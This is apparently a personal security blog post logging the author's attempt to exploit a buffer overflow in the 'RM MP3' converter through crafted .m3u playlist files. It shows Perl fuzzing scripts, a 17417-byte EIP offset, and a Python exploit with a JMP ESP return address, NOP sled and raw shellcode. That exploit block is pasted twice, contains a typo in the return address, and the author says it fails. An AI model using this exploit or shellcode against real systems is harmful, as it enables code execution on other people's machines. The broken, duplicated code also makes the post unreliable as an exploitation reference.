07.00
blogkublogmu
now i learn again buffer overflow, now i make buffer RM MP3, to make buffer i make file with perl script:
my $file= "crash2.m3u";
my $junk= "\x41" x 30000; => this i change to know how many caracter to buffer
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "m3u File Created successfully\n";
now i run this script to make file crash2.m3u then next step crash file will run on MP3 Converter
when i run on aplication RM MP3 nothing crash, i've fail but no problem i try make file with other script i make him from script exploitdb:
my $Header = "#EXTM3U\n";
my $ex="http://"."A" x 26121;
open(MYFILE,'>>asu.m3u');
print MYFILE $Header.$ex;
close(MYFILE);
then i run this perl script and next i run file to RM MP3 and tara tara,, boom,, crash i dont know what happen on my script before. and i must know it.. RM MP3 buffer on 20000 and 30000
now i change character A with character i make it with pattern create.
now i try again what happen next
i feel something wrong in there, but i will try again, so keept move on,,
now to create exploit i must know where
to get EIP need data 17417 byte, and go to stack need 17425
now i will write on EIP DADADADA
so i will write to syntax:
my $Header = "#EXTM3U\n";
my $ex="http://"."\x90" x 17417;
my $ex1="\xDA\xDA\xDA\xDA";
open (MYFILE,'>>b.m3u');
print MYFILE $Header.$ex.$ex1;
close(MYFILE);
yeaaa,, overwrite to EIP DADADADA so i get EIP,
but to write len on perl i dont know,, haha,, so skip this step to check EIP has got it i write EIP code with ESP JMP.
now i will write code again to make exploitation on windows, oh no i do something wrong my payload can't work: i've problem with payload again
file="fuck3.m3u"
junk="http://"+"\x90"* 17417
junk+="x\D7\x30\x9D\x7C"
junk+="\x90" * 32
junk+=("\x2b\xc9\xbe\x60\xbb\x9e\xe2\xda\xdf\xd9\x74\x24\xf4\x58\xb1\x51"
"\x83\xc0\x04\x31\x70\x0c\x03\x10\xb7\x7c\x17\x2c\xad\x6b\x95\x24"
"\xcb\x93\xd9\x4b\x4c\xe7\x4a\x97\xa9\x7c\xd7\xeb\x3a\xfe\xdd\x6b"
"\x3c\x10\x56\xc4\x26\x65\x36\xfa\x57\x92\x80\x71\x63\xef\x12\x6b"
"\xbd\x2f\x8d\xdf\x3a\x6f\xda\x18\x82\xba\x2e\x27\xc6\xd0\xc5\x1c"
"\x92\x02\x0e\x17\xff\xc0\x11\xf3\xfe\x3d\xcb\x70\x0c\x89\x9f\xd9"
"\x11\x0c\x4b\xe6\x05\x85\x02\x84\x71\x85\x75\x97\x4b\x6e\x11\x9c"
"\xef\xa0\x51\xe2\xe3\x4b\x15\xfe\x56\xc0\x96\xf6\xf6\xbf\x98\x48"
"\x09\xac\xf5\xab\xc3\x4a\xa5\x35\x84\xa1\x7b\xd1\x23\xb5\x49\x7e"
"\x98\xc6\x7e\xe8\xeb\xd4\x83\xd3\xbb\xd9\xaa\x7c\xb5\xc3\x35\x03"
"\x28\x03\xb8\x56\xd9\x16\x43\x88\x75\xce\xb2\xdd\x2b\xa7\x3b\xcb"
"\x67\x1b\x97\xa0\xd4\xd8\x44\x05\x88\x21\xba\xef\x46\xcf\x67\x89"
"\xc5\x66\x76\xc0\x82\xdc\x63\x9a\x95\x4a\x6b\x8c\x70\x65\xc2\x65"
"\x7a\x55\x8c\x21\x29\x78\xa4\x7e\xcd\x53\x65\xd5\xce\x8c\xe2\x30"
"\x79\xab\xba\xed\x85\x65\x6c\x45\x2e\xdf\x72\xb5\x5d\xb7\x6b\x4c"
"\xa4\x31\x23\x51\xfe\x97\x34\x7d\x99\x7d\xaf\x1b\x0e\xe1\x42\x6a"
"\x2b\x8f\xcc\x35\x9d\x9c\x64\x22\xb7\x58\xfe\x4e\x79\xa1\xf3\x24"
"\x84\x63\xd9\xc6\x3b\x48\xb2\xbb\xc6\xa8\x1f\x68\x9d\xa1\x2d\x90"
"\x51\x27\x2d\x19\xd2\xb7\x07\xba\x8d\x15\xf9\x6d\x63\xf0\xf8\xdc"
"\xd2\x51\xaa\x21\x04\x31\xe1\x04\xa0\x0c\xaa\x49\x7d\xfa\xb2\x4a"
"\xb5\x04\x9c\x3f\xed\x06\x9e\xfb\x76\x08\x77\x51\x88\x26\x10\xa5"
"\xfc\xc3\xbe\x16\xfe\x1a\xbf\x48")
file=open(file,'w')
file.write(junk)
print("success")
file.close()
file="fuck3.m3u"
junk="http://"+"\x90"* 17417
junk+="x\D7\x30\x9D\x7C"
junk+="\x90" * 32
junk+=("\x2b\xc9\xbe\x60\xbb\x9e\xe2\xda\xdf\xd9\x74\x24\xf4\x58\xb1\x51"
"\x83\xc0\x04\x31\x70\x0c\x03\x10\xb7\x7c\x17\x2c\xad\x6b\x95\x24"
"\xcb\x93\xd9\x4b\x4c\xe7\x4a\x97\xa9\x7c\xd7\xeb\x3a\xfe\xdd\x6b"
"\x3c\x10\x56\xc4\x26\x65\x36\xfa\x57\x92\x80\x71\x63\xef\x12\x6b"
"\xbd\x2f\x8d\xdf\x3a\x6f\xda\x18\x82\xba\x2e\x27\xc6\xd0\xc5\x1c"
"\x92\x02\x0e\x17\xff\xc0\x11\xf3\xfe\x3d\xcb\x70\x0c\x89\x9f\xd9"
"\x11\x0c\x4b\xe6\x05\x85\x02\x84\x71\x85\x75\x97\x4b\x6e\x11\x9c"
"\xef\xa0\x51\xe2\xe3\x4b\x15\xfe\x56\xc0\x96\xf6\xf6\xbf\x98\x48"
"\x09\xac\xf5\xab\xc3\x4a\xa5\x35\x84\xa1\x7b\xd1\x23\xb5\x49\x7e"
"\x98\xc6\x7e\xe8\xeb\xd4\x83\xd3\xbb\xd9\xaa\x7c\xb5\xc3\x35\x03"
"\x28\x03\xb8\x56\xd9\x16\x43\x88\x75\xce\xb2\xdd\x2b\xa7\x3b\xcb"
"\x67\x1b\x97\xa0\xd4\xd8\x44\x05\x88\x21\xba\xef\x46\xcf\x67\x89"
"\xc5\x66\x76\xc0\x82\xdc\x63\x9a\x95\x4a\x6b\x8c\x70\x65\xc2\x65"
"\x7a\x55\x8c\x21\x29\x78\xa4\x7e\xcd\x53\x65\xd5\xce\x8c\xe2\x30"
"\x79\xab\xba\xed\x85\x65\x6c\x45\x2e\xdf\x72\xb5\x5d\xb7\x6b\x4c"
"\xa4\x31\x23\x51\xfe\x97\x34\x7d\x99\x7d\xaf\x1b\x0e\xe1\x42\x6a"
"\x2b\x8f\xcc\x35\x9d\x9c\x64\x22\xb7\x58\xfe\x4e\x79\xa1\xf3\x24"
"\x84\x63\xd9\xc6\x3b\x48\xb2\xbb\xc6\xa8\x1f\x68\x9d\xa1\x2d\x90"
"\x51\x27\x2d\x19\xd2\xb7\x07\xba\x8d\x15\xf9\x6d\x63\xf0\xf8\xdc"
"\xd2\x51\xaa\x21\x04\x31\xe1\x04\xa0\x0c\xaa\x49\x7d\xfa\xb2\x4a"
"\xb5\x04\x9c\x3f\xed\x06\x9e\xfb\x76\x08\x77\x51\x88\x26\x10\xa5"
"\xfc\xc3\xbe\x16\xfe\x1a\xbf\x48")
file=open(file,'w')
file.write(junk)
print("success")
file.close()
Posted in: security
0 komentar:
Posting Komentar